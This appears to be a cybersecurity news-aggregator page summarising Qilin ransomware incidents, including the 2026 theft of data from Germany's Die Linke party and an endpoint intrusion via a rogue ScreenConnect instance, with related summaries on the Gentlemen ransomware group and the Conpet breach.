CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

Qilin Ransomware Campaign: German Political Party and Endpoint Compromises

First reported
Last updated
1 unique sources, 2 articles

Summary

Hide ▲

Qilin ransomware has been linked to a high-profile data theft incident targeting Die Linke, a major German political party with 123,000 members and 64 seats in the Bundestag. The group stole sensitive internal party data and personal information of headquarters employees, though the membership database was reportedly unaffected. Die Linke attributed the attack to Qilin, describing them as Russian-speaking cybercriminals with financial and political motivations, and suggested the incident may be part of hybrid warfare operations. The initial investigation focused on a Huntress Labs endpoint compromise where a rogue ScreenConnect instance was used to deploy malicious files and attempt disabling Windows Defender before ransomware deployment. Qilin operates as a ransomware-as-a-service (RaaS) variant with affiliates following diverse attack patterns.

Timeline

  1. 03.04.2026 19:36 1 articles · 23h ago

    Qilin claims attack on German political party Die Linke and threatens data leak

    On March 26, 2026, the Qilin ransomware group compromised the network of Die Linke, a German democratic socialist party with 123,000 members and 64 Bundestag seats. Die Linke disclosed the incident on March 26 but initially did not confirm a breach; on March 27, it confirmed attackers aimed to publish sensitive internal party data and personal information of party headquarters employees, while stating the membership database was unaffected. Die Linke attributed the attack to Qilin, describing them as Russian-speaking cybercriminals with financial and political motivations, and suggested the incident may constitute part of hybrid warfare operations. Qilin publicly claimed the attack on April 1, 2026, adding it to their data leak site without publishing data samples. Die Linke reported the incident to German authorities, filed a criminal complaint, and engaged independent IT experts to restore impacted systems.

    Show sources
    Open in new tab
  2. 22.11.2025 15:45 2 articles · 4mo ago

    Qilin Ransomware Incident Analysis

    The threat actor accessed the endpoint on October 8, 2025, and installed a rogue ScreenConnect instance. On October 11, 2025, three files were transferred to the endpoint via ScreenConnect. The threat actor attempted to disable Windows Defender and execute malicious files, but both attempts failed. Windows Defender detected attempts to create ransom notes, indicating the ransomware was likely launched from another endpoint.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Gentlemen Ransomware Exploits Vulnerable Driver to Disable Security Software

The Gentlemen ransomware group, active since summer 2025, continues to evolve its tactics while leveraging a ransomware-as-a-service (RaaS) model. The group employs dual extortion, targeting Windows, Linux, and ESXi environments, with initial access often gained through exploitation of exposed FortiGate VPN devices. Affiliates use PowerShell and WMI for lateral movement, deploy anti-forensic tools, and target backup/security systems to maximize impact. The group is known for advanced evasion techniques, including BYOVD attacks via CVE-2025-7771 in the ThrottleStop driver, tailored to disable specific security vendors' products. The gang emerged from a dispute within the Qilin RaaS ecosystem and rapidly established itself using existing tooling. Its attacks have targeted critical infrastructure, including Romania's Oltenia Energy Complex on December 26, 2025, where documents were encrypted and multiple applications (ERP, email, document management) were temporarily disabled. The company cooperated with authorities and restored systems from backups. The group uses PowerRun.exe and Allpatch2.exe for privilege escalation and ransom notes with the .7mtzhh extension. While the National Energy System was not jeopardized, the incident is still under assessment for potential data theft. The group has added nearly four dozen victims to its leak site but has not yet listed Oltenia Energy Complex, likely due to ongoing negotiations.

Open in new tab

Qilin ransomware group targets multiple organizations, including South Korean financial sector and Romanian oil pipeline operator Conpet

The Qilin ransomware group has confirmed the theft of nearly **1TB of data** from **Conpet S.A.**, Romania’s national oil pipeline operator, following a cyberattack on February 5, 2026. While the company’s **operational technologies (SCADA and telecommunications) remained unaffected**, the breach compromised corporate IT systems, exposing internal documents—including financial records and passport scans—some dated as recently as **November 2025**. Conpet has warned of potential fraud risks stemming from the stolen data and is working with Romania’s **National Cyber Security Directorate (DNSC)** to investigate the incident. This attack is part of Qilin’s broader 2025–2026 campaign, which has targeted high-profile victims across **62 countries**, including **Asahi Group (Japan)**, **Mecklenburg County Public Schools (U.S.)**, **Creative Box Inc. (Nissan subsidiary)**, and **Synnovis (UK pathology provider)**. The group employs **hybrid tactics**, such as abusing **Windows Subsystem for Linux (WSL)** to deploy Linux encryptors on Windows systems, **BYOVD (Bring Your Own Vulnerable Driver) exploits**, and **supply-chain compromises via Managed Service Providers (MSPs)**. Qilin’s **double-extortion model**—combining encryption with data leaks—has disrupted critical infrastructure, manufacturing, and financial sectors, with **over 700 confirmed victims in 2025 alone**. Recent developments include **politically charged leaks in South Korea** and **collaborations with affiliates like Scattered Spider**, underscoring the group’s evolving threat to global cybersecurity.

Open in new tab